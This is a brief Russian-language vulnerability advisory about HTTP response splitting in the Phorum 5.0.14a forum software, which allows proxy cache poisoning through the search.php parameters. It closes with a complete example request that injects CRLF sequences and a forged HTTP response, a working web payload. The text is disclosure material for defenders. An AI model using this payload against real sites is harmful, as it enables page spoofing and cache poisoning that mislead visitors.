Программа: Phorum 5.0.14a
Уязвимость позволяет удаленному
пользователю отравить кеш прокси сервера и
изменить содержимое web страниц уязвимого
сайта. Уязвимость существует из-за
недостаточной обработки параметра Location.
Удаленный пользователь может с помощью
специально сформированного HTTP GET запроса
произвести HTTP Response Splitting атаку и подменить
содержимое страниц сайта в кеше прокси
сервера.
Пример:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:
%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0
d%0aContent-Length:%2034%0d%0a%0d%0a<html>ScannedbyPTsecurity</html>%0d%0
a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30